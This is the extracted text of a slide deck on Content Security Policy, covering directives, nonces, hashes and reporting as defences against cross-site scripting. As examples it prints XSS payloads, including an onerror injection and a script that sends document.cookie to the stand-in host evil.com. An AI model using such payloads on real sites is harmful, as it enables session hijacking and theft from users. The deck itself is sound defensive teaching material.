@dheerajhere
Dheeraj Joshi
What & Why ?
Understanding XSS
Mitigating Attacks using CSP
Deploying CSP
"CRYPTOJACKING"
Cross-site Scripting is dead?
"><img src=x onerror=prompt(1)>
https://www.websearch.com/search?q=<script>document.write(
'<img src="//evil.com/?' + document.cookie + '">');</script>
[1,2,3] !== [1,2,3]
It's funny because it's TRUE
with great power comes great responsibility
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Tue, 13 Feb 2018 03:05:27 GMT
status: 200
strict-transport-security: max-age=631138519
<?
header("Content-Security-Policy: default-src 'self'");
?>
Allows loading resources from the sameorigin
http:// www.cspisawesome.com :80
Scheme
Hostname
Port
img-src *
Wildcard; allows any images except data: blob: filesystem: schemes. |
object-src 'none'
None; Prevents loading plugins from any source.
style-src example.com
Allows loading resources from the specified domain name.
Content-Security-Policy: script-src 'self'; object-src 'none';
base-uri 'none';
This policy disallows:
script-src 'unsafe-inline'
script-src 'unsafe-eval'
Allows use of inline source elements such as style attribute, onclick, script tag bodies or eval functions.
<script>alert('Hello, world.');</script>
base64_encode(hash('sha256', "alert('Hello, world.');", true))
Content-Security-Policy: default-src 'self';
script-src 'sha256-qznLcsROx4GACP2dm0UCKCzCG+HiZ1guq6ZZDob/Tng='
Only the exact script in the hash can run
<script nonce="r4nd0m" src="//cdn.com/lib.js">
Content-Security-Policy: default-src 'self';
script-src 'nonce-4AEemGb0xJptoIGFP3Nd'
Any script in a block with the nonce can run
This is how Twitter's CSP looks like 😟
script-src 'strict-dynamic' 'nonce-someNonce'
script-src 'strict-dynamic' 'sha256-hash'
Content-Security-Policy: script-src 'self' https://apis.google.com
<script src='http://evil.com/evil.js'></script>
Content-Security-Policy-Report-Only: [policy goes here];
report-uri https://yourname.report-uri.io
Content-Security-Policy: default-src https:;
form-action https:
Content-Security-Policy: upgrade-insecure-requests
<img src="http://example.com/sample.png">
<img src="https://example.com/sample.png">
oh, that's so old?
Expected behaviour
Actual behaviour
Whatttttt?
XFO: sameorigin
Content-Security-Policy: frame-ancestors 'none';
Content-Security-Policy: frame-ancestors
'self' cspisawesome.com